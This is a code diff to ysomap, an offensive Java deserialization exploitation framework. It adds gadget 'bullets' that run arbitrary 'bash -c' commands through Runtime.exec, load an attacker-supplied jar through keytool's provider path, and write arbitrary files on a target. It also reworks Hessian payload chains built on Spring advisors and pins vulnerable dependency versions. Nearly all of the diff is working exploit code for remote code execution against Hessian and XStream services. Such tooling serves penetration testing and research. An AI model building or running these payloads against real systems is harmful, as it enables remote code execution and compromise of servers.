update

core/pom.xml

@@ -9,6 +9,15 @@
     </parent>
     <modelVersion>4.0.0</modelVersion>
     <artifactId>core</artifactId>
+    <properties>
+        <spring.version>4.3.16.RELEASE</spring.version> <!-- 5.3.4  4.3.16.RELEASE -->
+        <hessian.group>com.alipay.sofa</hessian.group> <!-- com.caucho  com.alipay.sofa -->
+        <hessian.version>3.3.13</hessian.version>      <!-- 4.0.38      3.3.13 4.0.4    -->
+        <xstream.version>1.4.17</xstream.version>
+        <jackson.version>2.9.5</jackson.version>
+        <fastjson.version>1.2.58</fastjson.version>
+        <kryo.version>3.0.3</kryo.version>
+    </properties>
     <dependencies>
         <dependency>
             <groupId>junit</groupId>
@@ -31,33 +40,29 @@
         <dependency>
             <groupId>com.fasterxml.jackson.core</groupId>
             <artifactId>jackson-databind</artifactId>
-            <version>2.12.2</version>
+            <version>${jackson.version}</version>
         </dependency>
         <dependency>
-            <groupId>com.caucho</groupId>
+            <groupId>${hessian.group}</groupId>
             <artifactId>hessian</artifactId>
-            <version>4.0.38</version>
+            <version>${hessian.version}</version>
         </dependency>
-<!--        <dependency>-->
-<!--            <groupId>com.alipay.sofa</groupId>-->
-<!--            <artifactId>hessian</artifactId>-->
-<!--            <version>4.0.0</version>-->
-<!--        </dependency>-->
+
         <dependency>
             <groupId>com.thoughtworks.xstream</groupId>
             <artifactId>xstream</artifactId>
-            <version>1.4.17</version>
+            <version>${xstream.version}</version>
         </dependency>
         <dependency>
             <groupId>com.alibaba</groupId>
             <artifactId>fastjson</artifactId>
-            <version>1.2.58</version>
+            <version>${fastjson.version}</version>
         </dependency>
 
         <dependency>
             <groupId>com.esotericsoftware</groupId>
             <artifactId>kryo-shaded</artifactId>
-            <version>3.0.3</version>
+            <version>${kryo.version}</version>
         </dependency>
         <!-- ysomap utils dependencies -->
         <dependency>
@@ -97,23 +102,23 @@
         <dependency>
             <groupId>org.springframework</groupId>
             <artifactId>spring-aop</artifactId>
-            <version>5.3.4</version>
+            <version>${spring.version}</version>
         </dependency>
         <dependency>
             <groupId>org.springframework</groupId>
             <artifactId>spring-web</artifactId>
-            <version>5.3.4</version>
+            <version>${spring.version}</version>
         </dependency>
         <dependency>
             <groupId>org.springframework</groupId>
             <artifactId>spring-context</artifactId>
-            <version>5.3.4</version>
+            <version>${spring.version}</version>
         </dependency>
         <dependency>
             <!-- for SpringJndiBullet2 -->
             <groupId>org.springframework</groupId>
             <artifactId>spring-tx</artifactId>
-            <version>5.3.9</version>
+            <version>${spring.version}</version>
         </dependency>
         <dependency>
             <!-- for SpringJndiBullet2 -->
@@ -198,8 +203,18 @@
             <artifactId>groovy</artifactId>
             <version>2.4.3</version>
         </dependency>
+        <dependency>
+            <groupId>com.mchange</groupId>
+            <artifactId>c3p0</artifactId>
+            <version>0.9.5.5</version>
+        </dependency>
+        <dependency>
+            <groupId>com.mchange</groupId>
+            <artifactId>mchange-commons-java</artifactId>
+            <version>0.2.20</version>
+        </dependency>
 
-<!--        <dependency>-->
+        <!--        <dependency>-->
 <!--            <groupId>org.codehaus.groovy</groupId>-->
 <!--            <artifactId>groovy-all</artifactId>-->
 <!--            <version>2.1.9</version>-->

core/src/main/java/ysomap/bullets/spring/SpringExecBullet.java

@@ -0,0 +1,53 @@
+package ysomap.bullets.spring;
+
+import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
+import org.springframework.beans.factory.support.StaticListableBeanFactory;
+import ysomap.bullets.AbstractBullet;
+import ysomap.common.annotation.*;
+import ysomap.core.util.DetailHelper;
+import ysomap.core.util.ReflectionHelper;
+
+import java.lang.reflect.Method;
+
+/**
+ * @author wh1t3p1g
+ * @since 2022/5/16
+ */
+@Bullets
+@Authors({Authors.WH1T3P1G})
+@Details("任意函数调用")
+@Targets({Targets.HESSIAN, Targets.XSTREAM})
+@Dependencies({"org.springframework:spring-context"})
+public class SpringExecBullet extends AbstractBullet<Object> {
+
+    @NotNull
+    @Require(name = "command", detail = DetailHelper.COMMAND)
+    public String command;
+
+    private String beanName = "ysomap";
+
+    @Override
+    public Object getObject() throws Exception {
+        StaticListableBeanFactory beanFactory = new StaticListableBeanFactory();
+        beanFactory.addBean(beanName, makeBean());
+        return beanFactory;
+    }
+
+    public Object makeBean() throws Exception {
+        MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean();
+        bean.setSingleton(false);
+        bean.setTargetObject(Runtime.getRuntime());
+        Class cls = Runtime.class;
+        Method method = cls.getMethod("exec", String[].class);
+        ReflectionHelper.setFieldValue(bean, "methodObject", method);
+        ReflectionHelper.setFieldValue(bean, "beanClassLoader", null);
+        bean.setArguments(new Object[]{new String[]{"bash", "-c", command}});
+        return bean;
+    }
+
+    public static SpringExecBullet newInstance(Object... args) throws Exception {
+        SpringExecBullet bullet = new SpringExecBullet();
+        bullet.set("command", args[0]);
+        return bullet;
+    }
+}

core/src/main/java/ysomap/bullets/spring/SpringJndiBullet1.java

@@ -21,10 +21,13 @@ public class SpringJndiBullet1 extends AbstractBullet<Object> {
     @Require(name = "jndiURL", detail = "向外发起JNDI连接")
     public String jndiURL;
 
+    private String beanName;
+
     @Override
     public Object getObject() throws Exception {
         SimpleJndiBeanFactory bf = new SimpleJndiBeanFactory();
         bf.setShareableResources(jndiURL);
+        beanName = jndiURL;
         ReflectionHelper.setFieldValue(bf, "logger", new NoOpLog());
         ReflectionHelper.setFieldValue(bf.getJndiTemplate(), "logger", new NoOpLog());
         return bf;

core/src/main/java/ysomap/bullets/spring/SpringLoadJarBullet.java

@@ -0,0 +1,54 @@
+package ysomap.bullets.spring;
+
+import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
+import ysomap.common.annotation.*;
+import ysomap.core.util.ReflectionHelper;
+
+import java.lang.reflect.Method;
+
+/**
+ * @author wh1t3p1g
+ * @since 2022/5/16
+ */
+@Bullets
+@Authors({Authors.WH1T3P1G})
+@Details("任意函数调用")
+@Targets({Targets.HESSIAN, Targets.XSTREAM})
+@Dependencies({"org.springframework:spring-context"})
+public class SpringLoadJarBullet extends SpringExecBullet {
+
+    @NotNull
+    @Require(name = "filepath", detail = "上传至目标环境的jar路径")
+    public String filepath;
+
+    @NotNull
+    @Require(name = "evilClass", detail = "需要初始化的对象，默认调用无参构造函数")
+    public String evilClass;
+
+    private String beanName = "ysomap";
+
+    public Object makeBean() throws Exception {
+        MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean();
+        bean.setSingleton(false);
+        bean.setTargetObject(Runtime.getRuntime());
+        Class cls = sun.security.tools.keytool.Main.class;
+        Method method = cls.getMethod("main", String[].class);
+        ReflectionHelper.setFieldValue(bean, "methodObject", method);
+        ReflectionHelper.setFieldValue(bean, "beanClassLoader", null);
+        Object[] evilargs = new Object[]{new String[]{
+                "-LIST", "-provider:",
+                evilClass,
+                "-keystore", "NONE", "-protected", "-debug", "-providerpath",
+                filepath
+        }};
+        bean.setArguments(evilargs);
+        return bean;
+    }
+
+    public static SpringLoadJarBullet newInstance(Object... args) throws Exception {
+        SpringLoadJarBullet bullet = new SpringLoadJarBullet();
+        bullet.set("filepath", args[0]);
+        bullet.set("evilClass", args[1]);
+        return bullet;
+    }
+}

core/src/main/java/ysomap/bullets/spring/SpringUploadBullet.java

@@ -0,0 +1,54 @@
+package ysomap.bullets.spring;
+
+import com.sun.org.apache.xml.internal.security.utils.JavaUtils;
+import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
+import ysomap.common.annotation.*;
+import ysomap.core.util.FileHelper;
+import ysomap.core.util.ReflectionHelper;
+
+import java.lang.reflect.Method;
+
+/**
+ * @author wh1t3p1g
+ * @since 2022/5/16
+ */
+@Bullets
+@Authors({Authors.WH1T3P1G})
+@Details("任意函数调用")
+@Targets({Targets.HESSIAN, Targets.XSTREAM})
+@Dependencies({"org.springframework:spring-context"})
+public class SpringUploadBullet extends SpringExecBullet {
+
+    @NotNull
+    @Require(name = "filepath", detail = "/tmp/test")
+    public String filepath;
+
+    @NotNull
+    @Require(name = "localFile", detail = "/tmp/test")
+    public String localFile;
+
+    private String beanName = "ysomap";
+    private byte[] data = null;
+
+    public Object makeBean() throws Exception {
+        if(data == null){
+            data = FileHelper.getFileContent(localFile);
+        }
+        MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean();
+        bean.setSingleton(false);
+        Class<?> cls = JavaUtils.class;
+        bean.setTargetObject(cls);
+        Method method = cls.getMethod("writeBytesToFilename", String.class, byte[].class);
+        ReflectionHelper.setFieldValue(bean, "methodObject", method);
+        ReflectionHelper.setFieldValue(bean, "beanClassLoader", null);
+        bean.setArguments(filepath, data);
+        return bean;
+    }
+
+    public static SpringUploadBullet newInstance(Object... args) throws Exception {
+        SpringUploadBullet bullet = new SpringUploadBullet();
+        bullet.set("filepath", args[0]);
+        bullet.set("localFile", args[1]);
+        return bullet;
+    }
+}

core/src/main/java/ysomap/core/serializer/hessian/NoWriteReplaceSerializerFactory.java

@@ -1,15 +1,25 @@
 package ysomap.core.serializer.hessian;
 
-import com.caucho.hessian.io.*;
+import com.caucho.hessian.io.HessianProtocolException;
+import com.caucho.hessian.io.Serializer;
+import com.caucho.hessian.io.SerializerFactory;
+
+import java.lang.reflect.Method;
 
 public class NoWriteReplaceSerializerFactory extends SerializerFactory {
 
     @Override
     public com.caucho.hessian.io.Serializer getSerializer (Class cl ) throws HessianProtocolException {
         Serializer serializer = super.getSerializer(cl);
 
-        if ( serializer instanceof WriteReplaceSerializer) {
-            return UnsafeSerializer.create(cl);
+        if(serializer != null && serializer.getClass().getName().equals("com.caucho.hessian.io.WriteReplaceSerializer")){
+            try {
+                Class<?> unsafe = Class.forName("com.caucho.hessian.io.UnsafeSerializer");
+                Method create = unsafe.getMethod("create", Class.class);
+                return (Serializer) create.invoke(unsafe, cl);
+            } catch (Exception e) {
+                e.printStackTrace();
+            }
         }
 
         return serializer;

core/src/main/java/ysomap/payloads/hessian/SpringAbstractBeanFactoryPointcutAdvisor.java

@@ -1,11 +1,12 @@
 package ysomap.payloads.hessian;
 
-import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor;
 import org.springframework.beans.factory.BeanFactory;
+import org.springframework.cache.interceptor.BeanFactoryCacheOperationSourceAdvisor;
 import ysomap.bullets.Bullet;
 import ysomap.bullets.spring.SpringJndiBullet1;
 import ysomap.common.annotation.*;
 import ysomap.core.util.PayloadHelper;
+import ysomap.core.util.ReflectionHelper;
 
 /**
  * @author wh1t3p1g
@@ -14,19 +15,22 @@
 @Payloads
 @Authors({ Authors.MBECHLER })
 @Targets({Targets.HESSIAN})
-@Require(bullets = {"SpringJndiBullet1"},param = false)
+@Require(bullets = {"SpringJndiBullet1", "SpringExecBullet", "SpringLoadJarBullet", "SpringUploadBullet"},param = false)
 @Dependencies({"org.springframework:spring-context","org.springframework:spring-aop"})
 public class SpringAbstractBeanFactoryPointcutAdvisor extends HessianPayload{
+
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
         return SpringJndiBullet1.newInstance(args);
     }
 
     @Override
     public Object pack(Object obj) throws Exception {
-        DefaultBeanFactoryPointcutAdvisor pcadv = new DefaultBeanFactoryPointcutAdvisor();
-        pcadv.setBeanFactory((BeanFactory) obj);
-        pcadv.setAdviceBeanName(bullet.get("jndiURL"));
-        return PayloadHelper.makeMap(new DefaultBeanFactoryPointcutAdvisor(), pcadv);
+        BeanFactoryCacheOperationSourceAdvisor advisor = new BeanFactoryCacheOperationSourceAdvisor();
+        advisor.setBeanFactory((BeanFactory) obj);
+        advisor.setAdviceBeanName(bullet.get("beanName"));
+        ReflectionHelper.setFieldValue(advisor, "pointcut" , null);
+        ReflectionHelper.setFieldValue(advisor, "cacheOperationSource" , null);
+        return PayloadHelper.makeMap(new BeanFactoryCacheOperationSourceAdvisor(), advisor);
     }
 }

core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java

@@ -27,7 +27,7 @@ public Bullet getDefaultBullet(Object... args) throws Exception {
     public Object pack(Object obj) throws Exception {
         AspectInstanceFactory aif = ReflectionHelper.createWithoutConstructor(BeanFactoryAspectInstanceFactory.class);
         ReflectionHelper.setFieldValue(aif, "beanFactory", obj);
-        ReflectionHelper.setFieldValue(aif, "name", bullet.get("jndiURL"));
+        ReflectionHelper.setFieldValue(aif, "name", bullet.get("beanName"));
         AbstractAspectJAdvice advice = ReflectionHelper.createWithoutConstructor(AspectJAroundAdvice.class);
         ReflectionHelper.setFieldValue(advice, "aspectInstanceFactory", aif);